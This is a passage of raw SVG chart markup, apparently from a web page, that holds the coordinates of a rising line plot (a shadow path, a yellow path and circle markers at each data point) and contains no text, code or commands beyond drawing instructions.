280.50118835412957 179.33639012571464 L 282.4768270944742 178.88315492571462 L 284.4524658348188 178.88315492571462 L 286.4281045751634 178.88315492571462 L 288.40374331550805 178.88315492571462 L 290.37938205585266 178.88315492571462 L 292.35502079619727 178.88315492571462 L 294.33065953654193 178.88315492571462 L 296.30629827688654 178.88315492571462 L 298.28193701723114 178.88315492571462 L 300.25757575757575 178.88315492571462 L 302.2332144979204 178.88315492571462 L 304.208853238265 177.1467850971432 L 306.1844919786096 173.06024856380895 L 308.1601307189543 171.4390142780947 L 310.1357694592989 170.25361039238038 L 312.1114081996435 170.25361039238038 L 314.0870469399881 170.09957311999966 L 316.0626856803328 170.09957311999966 L 318.0383244206774 170.09957311999966 L 320.013963161022 170.09957311999966 L 321.98960190136665 170.09957311999966 L 323.96524064171126 170.09957311999966 L 325.94087938205587 170.09957311999966 L 327.9165181224005 169.15377700571395 L 329.89215686274514 167.15902454857113 L 331.86779560308975 165.98574820571397 L 333.84343434343435 164.51450980571397 L 335.81907308377896 161.6356645485711 L 337.7947118241236 160.45624831999967 L 339.77035056446823 159.91534975999966 L 341.74598930481284 159.1636044799995 L 343.7216280451575 154.9928460799995 L 345.6972667855021 154.34105407999948 L 347.6729055258467 152.28363419428518 L 349.6485442661913 150.20789613714234 L 351.624183006536 149.45157385142804 L 353.5998217468806 149.02352233142804 L 355.5754604872252 149.02352233142804 L 357.55109922756986 149.02352233142804 L 359.52673796791447 149.02352233142804 L 361.5023767082591 148.22896530285664 L 363.4780154486037 147.51893234285595 L 365.45365418894835 146.51879062857023 L 367.42929292929296 139.01554582857023 L 369.40493166963756 131.1252345142845 L 371.3805704099822 123.48944937142736 L 373.35620915032683 122.44409577142736 L 375.33184789067144 114.18356457142735 L 377.30748663101605 105.49689485714163 L 379.2831253713607 97.95655702857024 L 381.2587641117053 92.33018902857023 L 383.2344028520499 88.56856013714165 L 385.2100415923946 81.59222916571309 L 387.1856803327392 73.9680133942845 L 389.1613190730838 67.28380905142737 L 391.1369578134284 60.21492310857022 L 393.1125965537731 55.53465567999879 L 395.0882352941177 50.8868738285702" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.29607830857194 L 175.79233511586455 252.42512790857194 L 177.76797385620918 252.42512790857194 L 179.74361259655382 252.42512790857194 L 181.71925133689842 252.42512790857194 L 183.69489007724306 252.42512790857194 L 185.67052881758767 251.66171177142908 L 187.6461675579323 250.58636012190482 L 189.6218062982769 249.66792568381032 L 191.59744503862154 247.8407768838103 L 193.57308377896615 246.76382063238174 L 195.5487225193108 245.49141304381067 L 197.52436125965542 243.22067469714472 L 199.50000000000003 240.62913549714472 L 201.47563874034466 237.07079264000186 L 203.45127748068927 234.76142432000188 L 205.4269162210339 232.557837942859 L 207.4025549613785 231.01424022857327 L 209.37819370172315 230.02149795047728 L 211.35383244206778 227.29883920762012 L 213.3294711824124 224.97638937904867 L 215.30510992275703 220.81527212190582 L 217.28074866310163 218.81052332190583 L 219.25638740344627 215.28957795047728 L 221.23202614379088 214.32932012190582 L 223.2076648841355 211.7686325790487 L 225.18330362448012 209.93235006476297 L 227.15894236482475 207.77176995047728 L 229.1345811051694 205.2708574933344 L 231.110219845514 203.6382568076201 L 233.08585858585863 201.44296857904868 L 235.06149732620324 200.10335715047728 L 237.03713606654787 199.01160428190582 L 239.01277480689248 199.01160428190582 L 240.98841354723712 198.43320505904887 L 242.96405228758175 197.69702768762028 L 244.93969102792636 195.97801980952494 L 246.915329768271 195.18307544381065 L 248.8909685086156 195.18307544381065 L 250.86660724896024 195.18307544381065 L 252.84224598930484 195.18307544381065 L 254.81788472964945 195.18307544381065 L 256.79352346999406 195.18307544381065 L 258.7691622103387 195.18307544381065 L 260.7448009506833 195.18307544381065 L 262.72043969102793 194.4906993066678 L 264.69607843137254 193.63136225523925 L 266.6717171717172 192.76221886476281 L 268.6473559120618 192.5944855314296 L 270.6229946524064 192.33164880762007 L 272.598633392751 191.77643737904867 L 274.5742721330957 191.39257273904872 L 276.5499108734403 189.08710710857213 L 278.5255496137849 184.33417590857212 L 280.50118835412957 179.33639012571464 L 282.4768270944742 178.88315492571462 L 284.4524658348188 178.88315492571462 L 286.4281045751634 178.88315492571462 L 288.40374331550805 178.88315492571462 L 290.37938205585266 178.88315492571462 L 292.35502079619727 178.88315492571462 L 294.33065953654193 178.88315492571462 L 296.30629827688654 178.88315492571462 L 298.28193701723114 178.88315492571462 L 300.25757575757575 178.88315492571462 L 302.2332144979204 178.88315492571462 L 304.208853238265 177.1467850971432 L 306.1844919786096 173.06024856380895 L 308.1601307189543 171.4390142780947 L 310.1357694592989 170.25361039238038 L 312.1114081996435 170.25361039238038 L 314.0870469399881 170.09957311999966 L 316.0626856803328 170.09957311999966 L 318.0383244206774 170.09957311999966 L 320.013963161022 170.09957311999966 L 321.98960190136665 170.09957311999966 L 323.96524064171126 170.09957311999966 L 325.94087938205587 170.09957311999966 L 327.9165181224005 169.15377700571395 L 329.89215686274514 167.15902454857113 L 331.86779560308975 165.98574820571397 L 333.84343434343435 164.51450980571397 L 335.81907308377896 161.6356645485711 L 337.7947118241236 160.45624831999967 L 339.77035056446823 159.91534975999966 L 341.74598930481284 159.1636044799995 L 343.7216280451575 154.9928460799995 L 345.6972667855021 154.34105407999948 L 347.6729055258467 152.28363419428518 L 349.6485442661913 150.20789613714234 L 351.624183006536 149.45157385142804 L 353.5998217468806 149.02352233142804 L 355.5754604872252 149.02352233142804 L 357.55109922756986 149.02352233142804 L 359.52673796791447 149.02352233142804 L 361.5023767082591 148.22896530285664 L 363.4780154486037 147.51893234285595 L 365.45365418894835 146.51879062857023 L 367.42929292929296 139.01554582857023 L 369.40493166963756 131.1252345142845 L 371.3805704099822 123.48944937142736 L 373.35620915032683 122.44409577142736 L 375.33184789067144 114.18356457142735 L 377.30748663101605 105.49689485714163 L 379.2831253713607 97.95655702857024 L 381.2587641117053 92.33018902857023 L 383.2344028520499 88.56856013714165 L 385.2100415923946 81.59222916571309 L 387.1856803327392 73.9680133942845 L 389.1613190730838 67.28380905142737 L 391.1369578134284 60.21492310857022 L 393.1125965537731 55.53465567999879 L 395.0882352941177 50.8868738285702" fill="none" stroke="#DDDF0D" stroke-width="2"></path><circle cx="395.0882352941177" cy="50.8868738285702" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="393.1125965537731" cy="55.53465567999879" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="391.1369578134284" cy="60.21492310857022" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="389.1613190730838" cy="67.28380905142737" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="387.1856803327392" cy="73.9680133942845" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="385.2100415923946" cy="81.59222916571309" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="383.2344028520499" cy="88.56856013714165" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="381.2587641117053" cy="92.33018902857023" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="379.2831253713607" cy="97.95655702857024" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="377.30748663101605" cy="105.49689485714163" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="375.33184789067144" cy="114.18356457142735" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="373.35620915032683" cy="122.44409577142736" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="371.3805704099822" cy="123.48944937142736" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="369.40493166963756" cy="131.1252345142845" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="367.42929292929296" cy="139.01554582857023" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="365.45365418894835" cy="146.51879062857023" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="363.4780154486037" cy="147.51893234285595" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="361.5023767082591" cy="148.22896530285664" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="359.52673796791447" cy="149.02352233142804" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="357.55109922756986" cy="149.02352233142804" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="355.5754604872252" cy="149.02352233142804" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="353.5998217468806" cy="149.02352233142804" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="351.624183006536" cy="149.45157385142804" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="349.6485442661913" cy="150.20789613714234" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="347.6729055258467" cy="152.28363419428518" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="345.6972667855021" cy="154.34105407999948" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="343.7216280451575" cy="154.9928460799995" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="341.74598930481284" cy="159.1636044799995" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="339.77035056446823" cy="159.91534975999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="337.7947118241236" cy="160.45624831999967" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="335.81907308377896" cy="161.6356645485711" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="333.84343434343435" cy="164.51450980571397" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="331.86779560308975" cy="165.98574820571397" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="329.89215686274514" cy="167.15902454857113" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="327.9165181224005" cy="169.15377700571395" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="325.94087938205587" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="323.96524064171126" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="321.98960190136665" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="320.013963161022" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="318.0383244206774" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="316.0626856803328" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="314.0870469399881" cy="170.09957311999966" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="312.1114081996435" cy="170.25361039238038" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="310.1357694592989" cy="170.25361039238038" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="308.1601307189543" cy="171.4390142780947" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="306.1844919786096" cy="173.06024856380895" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="304.208853238265" cy="177.1467850971432" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="302.2332144979204" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="300.25757575757575" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="298.28193701723114" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="296.30629827688654" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="294.33065953654193" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="292.35502079619727" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="290.37938205585266" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="288.40374331550805" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="286.4281045751634" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="284.4524658348188" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="282.4768270944742" cy="178.88315492571462" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="280.50118835412957" cy="179.33639012571464" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="278.5255496137849" cy="184.33417590857212" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="276.5499108734403" cy="189.08710710857213" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="274.5742721330957" cy="191.39257273904872" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="272.598633392751" cy="191.77643737904867" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="270.6229946524064" cy="192.33164880762007" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="268.6473559120618" cy="192.5944855314296" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="266.6717171717172" cy="192.76221886476281" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="264.69607843137254" cy="193.63136225523925" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="262.72043969102793" cy="194.4906993066678" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="260.7448009506833" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="258.7691622103387" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="256.79352346999406" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="254.81788472964945" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="252.84224598930484" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="250.86660724896024" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="248.8909685086156" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="246.915329768271" cy="195.18307544381065" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="244.93969102792636" cy="195.97801980952494" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="242.96405228758175" cy="197.69702768762028" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="240.98841354723712" cy="198.43320505904887" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="239.01277480689248" cy="199.01160428190582" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="237.03713606654787" cy="199.01160428190582" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="235.06149732620324" cy="200.10335715047728" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="233.08585858585863" cy="201.44296857904868" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="231.110219845514" cy="203.6382568076201" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="229.1345811051694" cy="205.2708574933344" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="227.15894236482475" cy="207.77176995047728" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="225.18330362448012" cy="209.93235006476297" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="223.2076648841355" cy="211.7686325790487" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="221.23202614379088" cy="214.32932012190582" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="219.25638740344627" cy="215.28957795047728" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="217.28074866310163" cy="218.81052332190583" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="215.30510992275703" cy="220.81527212190582" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="213.3294711824124" cy="224.97638937904867" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="211.35383244206778" cy="227.29883920762012" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="209.37819370172315" cy="230.02149795047728" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="207.4025549613785" cy="231.01424022857327" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="205.4269162210339" cy="232.557837942859" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="203.45127748068927" cy="234.76142432000188" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="201.47563874034466" cy="237.07079264000186" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="199.50000000000003" cy="240.62913549714472" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="197.52436125965542" cy="243.22067469714472" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="195.5487225193108" cy="245.49141304381067" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="193.57308377896615" cy="246.76382063238174" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="191.59744503862154" cy="247.8407768838103" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="189.6218062982769" cy="249.66792568381032" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="187.6461675579323" cy="250.58636012190482" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="185.67052881758767" cy="251.66171177142908" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="183.69489007724306" cy="252.42512790857194" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="181.71925133689842" cy="252.42512790857194" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="179.74361259655382" cy="252.42512790857194" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="177.76797385620918" cy="252.42512790857194" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="175.79233511586455" cy="252.42512790857194" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="173.81669637551994" cy="253.29607830857194" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="171.8410576351753" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="169.8654188948307" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="167.88978015448606" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="165.91414141414145" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="163.93850267379682" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="161.96286393345218" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="159.98722519310758" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="158.01158645276294" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="156.03594771241833" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="154.0603089720737" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="152.0846702317291" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="150.10903149138446" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="148.13339275103985" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="146.15775401069521" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="144.18211527035058" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="142.20647653000597" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="140.23083778966134" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="138.25519904931673" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="136.2795603089721" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="134.3039215686275" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="132.32828282828285" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="130.35264408793822" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="128.3770053475936" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="126.40136660724897" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="124.42572786690435" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="122.45008912655972" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="120.4744503862151" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="118.49881164587048" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="116.52317290552585" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="114.54753416518123" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="112.57189542483661" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="110.59625668449199" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="108.62061794414737" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="106.64497920380273" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="104.66934046345811" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="102.69370172311349" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="100.71806298276887" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="98.74242424242425" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="96.76678550207963" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="94.791146761735" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="92.81550802139039" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="90.83986928104575" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="88.86423054070113" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="86.88859180035651" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="84.91295306001189" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="82.93731431966727" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="80.96167557932264" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="78.98603683897802" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="77.0103980986334" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="75.03475935828877" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="73.05912061794415" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="71.08348187759952" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="69.1078431372549" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="67.13220439691028" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="65.15656565656566" cy="253.71428571428572" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="63.18092691622104" cy="253.71428571428572" r="4" 